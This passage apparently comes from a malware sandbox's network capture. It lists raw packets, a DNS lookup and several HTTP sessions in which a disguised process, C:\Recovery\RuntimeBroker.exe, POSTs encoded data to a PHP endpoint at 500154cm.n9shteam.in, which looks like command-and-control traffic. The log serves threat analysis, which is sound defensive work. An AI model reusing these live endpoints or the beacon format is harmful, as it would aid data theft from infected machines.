                                                                                                            Nov 12, 2024 00:44:25.861324072 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.861418009 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.868506908 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.214083910 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.218998909 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.219007969 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.219018936 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.429392099 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.479592085 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.504298925 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.589181900 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.631853104 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.631858110 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.636748075 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.636879921 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.636991024 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.637047052 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.637296915 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.641706944 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.809123993 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.809123993 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.813971996 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.814116955 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.818001986 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.822880983 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.857229948 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.932801008 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.937591076 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.937644005 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.937751055 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.942466974 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.167114973 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.197626114 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.197680950 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.199237108 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.199299097 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.292057037 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.296972990 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.296983004 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.296993971 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.381042957 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.461978912 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.462024927 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.503346920 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.580945969 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.581008911 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.699671030 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.699771881 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.700417042 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705353022 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.705415964 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705472946 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.705522060 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705677032 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.706305027 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.706342936 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.710407019 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.058024883 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.062997103 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.063004971 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.063018084 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.271972895 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.353972912 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.354085922 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.476391077 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.477530956 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.481687069 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.481797934 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.482332945 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.482456923 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.482620001 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.487432003 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.842031956 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.847366095 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.847381115 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.847393036 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.069516897 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.151808023 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.151855946 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.276814938 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.277498007 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282108068 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.282155037 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282284021 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.282341957 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282481909 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.287265062 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.635874033 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.640810013 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.640815973 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.640825987 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.848844051 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.924024105 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.930031061 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.039043903 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.039051056 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.045542955 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.045809984 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.045836926 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.045913935 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.046019077 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.052755117 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.402038097 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.409369946 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.409382105 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.409524918 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.613318920 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.693099976 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.693238020 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:40.328527927 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.328536034 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.539990902 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.589020967 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:40.621489048 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.792354107 CET5019780192.168.2.437.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 00:42:16.817224979 CET | 57208 | 53 | 192.168.2.4 | 1.1.1.1
Nov 12, 2024 00:42:16.828620911 CET | 53 | 57208 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 00:42:16.817224979 CET | 192.168.2.4 | 1.1.1.1 | 0xe0e8 | Standard query (0) | 500154cm.n9shteam.in | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 00:42:16.828620911 CET | 1.1.1.1 | 192.168.2.4 | 0xe0e8 | No error (0) | 500154cm.n9shteam.in |  | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                                                                            • 500154cm.n9shteam.in
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:16.877166986 CET | 315 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 344
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:17.229152918 CET344OUTData Raw: 00 0a 01 06 06 01 01 00 05 06 02 01 02 07 01 05 00 06 05 0b 02 07 03 0d 00 53 0e 03 06 01 03 04 0c 04 05 00 00 04 05 05 0f 05 04 01 06 00 05 55 05 03 0d 08 0e 03 07 0b 04 50 04 01 04 57 07 00 00 06 0f 5c 00 03 04 52 0b 04 0f 02 0d 01 0f 51 07 51
                                                                                                            Data Ascii: SUPW\RQQQ\L~Ahf@camuuh@Uuvoc]|pkYoUs{bhmht^c]i_~V@A{SbL}Le
Nov 12, 2024 00:42:17.459933996 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:17.538325071 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 1368
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 56 4a 7e 4c 7b 7d 59 49 6f 5b 63 5d 68 4f 7c 5b 7d 64 73 4f 7c 70 75 41 7a 73 7c 42 7d 5b 78 03 63 63 75 08 79 5f 61 01 77 75 68 48 6a 61 78 01 55 4b 71 41 60 5b 63 4a 7f 62 79 4f 6b 01 6a 08 6c 65 7c 41 6a 60 74 58 62 62 7d 05 74 61 75 48 7c 4f 7a 01 6a 7c 56 0d 7d 01 7c 5f 62 76 7b 06 7c 5b 62 59 7e 63 6a 59 6f 67 70 43 6c 59 51 5e 6c 53 5e 58 79 5c 6c 48 6c 60 62 06 7d 70 63 59 79 77 56 4a 7c 62 78 5c 76 5f 64 04 7a 51 41 5b 6b 64 7b 52 7c 5f 62 55 62 52 6b 5a 78 0a 68 03 76 63 62 0c 7a 58 65 49 69 7c 76 05 6c 5f 5b 5d 76 5a 67 06 61 58 7b 5e 74 07 7e 50 7e 5d 7a 06 77 71 7d 07 76 65 68 09 7f 7f 75 05 60 6f 70 04 7c 63 6f 59 6f 6c 5d 03 6f 70 66 44 6b 6d 7f 51 77 67 6c 05 69 62 62 09 7e 53 63 0d 6c 43 5c 02 6a 5c 53 40 7b 5d 46 51 7c 55 6c 43 7f 70 7c 42 69 5e 62 06 6f 53 5a 5e 7b 62 5a 46 7c 07 6b 03 7e 01 6c 54 7f 4e 69 0b 6d 4d 6b 5d 6a 72 67 58 63 73 57 51 7b 5c 79 03 76 76 74 48 7e 76 70 03 7f 76 53 41 76 72 73 4a 7c 62 5b 4d 7c 67 76 0a 7b 66 6c 0c 7c 63 67 04 75 4c 5f 4c 74 61 7d 4a 7f 71 [TRUNCATED]
                                                                                                            Data Ascii: VJ~L{}YIo[c]hO|[}dsO|puAzs|B}[xccuy_awuhHjaxUKqA`[cJbyOkjle|Aj`tXbb}tauH|Ozj|V}|_bv{|[bY~cjYogpClYQ^lS^Xy\lHl`b}pcYywVJ|bx\v_dzQA[kd{R|_bUbRkZxhvcbzXeIi|vl_[]vZgaX{^t~P~]zwq}vehu`op|coYol]opfDkmQwglibb~SclC\j\S@{]FQ|UlCp|Bi^boSZ^{bZF|k~lTNimMk]jrgXcsWQ{\yvvtH~vpvSAvrsJ|b[M|gv{fl|cguL_Lta}JqbK}llgsvaYxrq}NaDygxxwRO{ScHzblIx]z}`pxwt}rsvORH~|{H|YVO|__NuRp{lVFt`f@zay~RzN{OTHu]UuaVOwOfN~`rtb}wuhBBSOvl|LclIxR]zpj}}^vwZN~rbA|mgxCv}bSM^|Rp~^RO~gf{Cc{LZaU}wwB~`}B{cxbRwsyOzqWwfpK}vRvStbk|raM|YrxH`}]v\}wa_I|qfI}B^}wUuOsIxLaH}`u{I^C{whxmcy\|{M\O{]NZxgxDiqsvsY|ckgYR|_PSuBs\xBxwNbmafX~Uj_z\yvxBagx[L~JxYjtbPXwv`A|UatB^k]^DlUdZ{`rI}mwSw`j\aSzSYQVq}@T[\\hl{uSoUe|]RtAfW|boaCkm`ePtdPUsfVm`Yj[MG]fAbrbeEQ{_S\SQuu{|L\\}grC{_l|scwr_L`OikXz}|tidDvakJl_qVMr]ldCT{o[WnWT[cIQ`aLVwpYl\Mt_|G}QJwZQ~v~WboAWpg_Xc_mXVkz|^]\NtiZDppyIU|X^uur[bfOSpf[XoSRZo]WoG|^\ZfTopuU@S[DQz|VonAR~fY [TRUNCATED]
                                                                                                            Nov 12, 2024 00:42:17.538343906 CET289INData Raw: 5a 7e 75 7a 5b 68 64 0a 4e 54 7a 6f 56 52 60 07 56 61 04 01 07 5b 5b 6a 49 54 60 7d 47 6a 7f 60 50 7f 5a 78 65 6d 4c 7b 43 7c 5b 5c 5c 51 07 7a 40 52 64 5d 44 54 5f 00 5f 54 0a 64 44 53 7e 7f 04 61 5a 71 42 68 67 70 05 7f 5f 63 46 52 6e 64 5b 62
                                                                                                            Data Ascii: Z~uz[hdNTzoVR`Va[[jIT`}Gj`PZxemL{C|[\\Qz@Rd]DT__TdDS~aZqBhgp_cFRnd[bvwdWphk|_Pm^ioZVU][`g~J}XP\QqEQbWAZ[YZXbUSZas[jYq[VQxQG\coCRpAlZGm}EPWkI[^oCTsPQncQzP~_|uzYhcOPpoWQc^QtqTa`lqdX~\{Zp|VkcOVo[QaW[pMn\\e
Nov 12, 2024 00:42:17.590909004 CET | 291 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 384
                                                                                                            Expect: 100-continue
Nov 12, 2024 00:42:17.764523983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:17.765181065 CET384OUTData Raw: 51 51 5b 5e 53 5d 59 5c 5c 58 5a 51 50 53 58 52 5b 56 5e 58 55 5a 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QQ[^S]Y\\XZQPSXR[V^XUZZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- 6=;95-%&85,>*!(']*975]+%&[!"^.
Nov 12, 2024 00:42:18.014419079 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0d 3c 03 33 1c 21 2f 33 08 2d 2d 21 0f 25 30 20 10 28 01 38 59 35 00 30 5c 2c 1d 03 55 34 00 05 06 27 03 2d 5b 20 3f 31 51 28 12 21 5b 05 12 22 07 34 15 02 56 28 2c 2c 13 2d 31 2c 05 21 0e 02 07 2e 07 27 53 3e 17 36 0c 30 3c 2a 56 27 0f 38 1d 3a 2d 2a 58 3c 01 23 56 23 34 2e 55 0b 11 23 52 30 06 23 51 37 01 2f 58 32 00 34 51 21 3e 29 0e 31 5c 24 50 32 2a 23 1e 32 1f 07 04 32 0c 2e 5c 27 3a 36 03 3f 39 2b 5a 24 10 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "<3!/3--!%0 (8Y50\,U4'-[ ?1Q(!["4V(,,-1,!.'S>60<*V'8:-*X<#V#4.U#R0#Q7/X24Q!>)1\$P2*#22.\':6?9+Z$#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:17.767941952 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:18.119329929 CET2504OUTData Raw: 54 51 5b 5e 56 50 59 59 5c 58 5a 51 50 5a 58 5c 5b 54 5e 50 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[^VPYY\XZQPZX\[T^PUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_,3=>:#<=';!/=#>6;6%=)\(%&]7!+%&[!"^.
Nov 12, 2024 00:42:18.335958004 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:18.407733917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:18 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:18.670970917 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1812
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:19.025418997 CET1812OUTData Raw: 54 51 5b 50 56 5c 59 5d 5c 58 5a 51 50 58 58 51 5b 56 5e 5d 55 5c 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[PV\Y]\XZQPXXQ[V^]U\ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'90!=56E'50"+#=6"Q$.=[>%*#3=?5&[!"^.!
Nov 12, 2024 00:42:19.367739916 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:19.368887901 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 04 3b 11 36 5a 20 54 39 2e 03 09 27 30 06 11 2b 28 24 59 21 07 20 10 2c 0d 0f 56 22 3d 2f 03 24 5c 2e 02 22 2f 31 18 28 02 21 5b 05 12 21 17 23 5d 2f 0c 3f 05 24 5a 2d 0f 02 02 22 1e 09 59 2d 39 0e 08 2a 00 3e 0e 24 3c 0f 0e 30 1f 24 5a 3a 2d 2a 15 28 2f 23 50 35 1e 2e 55 0b 11 23 54 30 38 09 1c 20 01 2f 58 25 10 09 09 22 3d 0b 08 26 2a 2b 0d 26 14 2b 5b 26 08 39 02 32 0b 31 06 25 39 3d 5f 2a 39 33 1f 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(;6Z T9.'0+($Y! ,V"=/$\."/1(![!#]/?$Z-"Y-9*>$<0$Z:-*(/#P5.U#T08 /X%"=&*+&+[&921%9=_*933#Q-/V=[W
Nov 12, 2024 00:42:19.368982077 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 04 3b 11 36 5a 20 54 39 2e 03 09 27 30 06 11 2b 28 24 59 21 07 20 10 2c 0d 0f 56 22 3d 2f 03 24 5c 2e 02 22 2f 31 18 28 02 21 5b 05 12 21 17 23 5d 2f 0c 3f 05 24 5a 2d 0f 02 02 22 1e 09 59 2d 39 0e 08 2a 00 3e 0e 24 3c 0f 0e 30 1f 24 5a 3a 2d 2a 15 28 2f 23 50 35 1e 2e 55 0b 11 23 54 30 38 09 1c 20 01 2f 58 25 10 09 09 22 3d 0b 08 26 2a 2b 0d 26 14 2b 5b 26 08 39 02 32 0b 31 06 25 39 3d 5f 2a 39 33 1f 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(;6Z T9.'0+($Y! ,V"=/$\."/1(![!#]/?$Z-"Y-9*>$<0$Z:-*(/#P5.U#T08 /X%"=&*+&+[&921%9=_*933#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:18.672691107 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:19.025933027 CET2512OUTData Raw: 54 55 5e 53 56 5b 5c 5f 5c 58 5a 51 50 58 58 52 5b 50 5e 5b 55 54 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU^SV[\_\XZQPXXR[P^[UTZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-*>;25<%'8!88T)*Z5*31[)&"\ #>)5&[!"^.!
Nov 12, 2024 00:42:19.367254019 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:19.368865013 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ
Nov 12, 2024 00:42:19.368951082 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:19.649044037 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
